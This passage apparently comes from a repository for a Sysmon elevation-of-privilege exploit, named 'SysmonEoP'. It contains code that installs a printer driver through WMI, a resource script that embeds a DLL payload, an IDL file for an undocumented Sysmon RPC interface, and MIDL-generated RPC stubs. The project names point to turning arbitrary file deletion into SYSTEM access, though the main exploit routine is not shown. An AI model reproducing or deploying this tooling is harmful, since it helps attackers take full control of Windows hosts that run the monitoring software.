(LPVOID*)&pLoc);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemServices* pSvc = NULL;\r\n    hr = pLoc->ConnectServer(_bstr_t(L\"ROOT\\\\StandardCimv2\"), NULL, NULL, 0, NULL, 0, 0, &pSvc);\r\n    if (FAILED(hr)) {\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);\r\n    if (FAILED(hr)) {\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n    }\r\n    BSTR MethodName = SysAllocString(L\"Add\");\r\n    BSTR ClassName = SysAllocString(L\"MSFT_PrinterDriver\");\r\n    IWbemClassObject* pClass = NULL;\r\n    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);\r\n    IWbemClassObject* pInParamsDefinition = NULL;\r\n    hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);\r\n    IWbemClassObject* pClassInstance = NULL;\r\n    hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);\r\n    VARIANT varCommand,varCommand2;\r\n    varCommand.vt = VT_BSTR;\r\n    varCommand.bstrVal = _bstr_t(L\"Generic / Text Only\");\r\n    varCommand2.vt = VT_BSTR;\r\n    varCommand2.bstrVal = _bstr_t(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\");\r\n    hr = pClassInstance->Put(L\"Name\", 0, &varCommand, 0);\r\n    hr = pClassInstance->Put(L\"InfPath\", 0, &varCommand2, 0);\r\n    IWbemClassObject* pOutParams = NULL;\r\n    hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);\r\n\r\n    if (FAILED(hr))\r\n    {\r\n\r\n        VariantClear(&varCommand);\r\n        SysFreeString(ClassName);\r\n        SysFreeString(MethodName);\r\n        pClass->Release();\r\n        pClassInstance->Release();\r\n        pInParamsDefinition->Release();\r\n        pOutParams->Release();\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}\r\nvoid __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)\r\n{\r\n    return((void __RPC_FAR*) malloc(cBytes));\r\n}\r\n\r\nvoid __RPC_USER midl_user_free(void __RPC_FAR* p)\r\n{\r\n    free(p);\r\n}"
  },
  {
    "path": "v2/SysmonEoP/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#define IDR_DLL1                        101\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        107\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "v2/SysmonEoP/resource.rc",
    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n// English (United Kingdom) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)\r\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK\r\n#pragma code_page(1252)\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n\"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE\r\nBEGIN\r\n\"#include \"\"winres.h\"\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE\r\nBEGIN\r\n\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// RBS\r\n//\r\n\r\nIDR_DLL1                DLL                     \"dll.dll\"\r\n\r\n\r\n#endif    // English (United Kingdom) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon.idl",
    "content": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\tvoid Proc1(\r\n\t\t[in]long arg_0,\r\n\t\t[in][string]  wchar_t* arg_1);\r\n}"
  },
  {
    "path": "v2/SysmonEoP/sysmon_c.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n#define GENERIC_BINDING_TABLE_SIZE   0            \r\n\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;\r\n\r\n\r\nstatic const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =\r\n    {\r\n    sizeof(RPC_CLIENT_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ProxyInfo,\r\n    0x02000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\nstatic RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;\r\n\r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle)\r\n{\r\n\r\n    CLIENT_CALL_RETURN _RetVal;\r\n\r\n    _RetVal = NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  0,\r\n                  0,\r\n                  IDL_handle);\r\n    return ( long  )_RetVal.Simple;\r\n    \r\n}\r\n\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1)\r\n{\r\n\r\n    NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  1,\r\n                  0,\r\n                  IDL_handle,\r\n                  arg_0,\r\n                  arg_1);\r\n    \r\n}\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcClientInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    &DefaultIfName__MIDL_AutoBindHandle,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    0,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\nstatic const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =\r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    \r\n    };\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon_h.h",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n\r\n\r\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\r\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\r\n#define __REQUIRED_RPCNDR_H_VERSION__ 500\r\n#endif\r\n\r\n#include \"rpc.h\"\r\n#include \"rpcndr.h\"\r\n\r\n#ifndef __RPCNDR_H_VERSION__\r\n#error this stub requires an updated version of <rpcndr.h>\r\n#endif /* __RPCNDR_H_VERSION__ */\r\n\r\n\r\n#ifndef __sysmon_h_h__\r\n#define __sysmon_h_h__\r\n\r\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\r\n#pragma once\r\n#endif\r\n\r\n/* Forward Declarations */ \r\n\r\n#ifdef __cplusplus\r\nextern \"C\"{\r\n#endif \r\n\r\n\r\n#ifndef __DefaultIfName_INTERFACE_DEFINED__\r\n#define __DefaultIfName_INTERFACE_DEFINED__\r\n\r\n/* interface DefaultIfName */\r\n/* [version][uuid] */ \r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle);\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1);\r\n\r\n\r\n\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;\r\n#endif /* __DefaultIfName_INTERFACE_DEFINED__ */\r\n\r\n/* Additional Prototypes for ALL interfaces */\r\n\r\n/* end of Additional Prototypes */\r\n\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n\r\n#endif\r\n\r\n\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon_s.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING 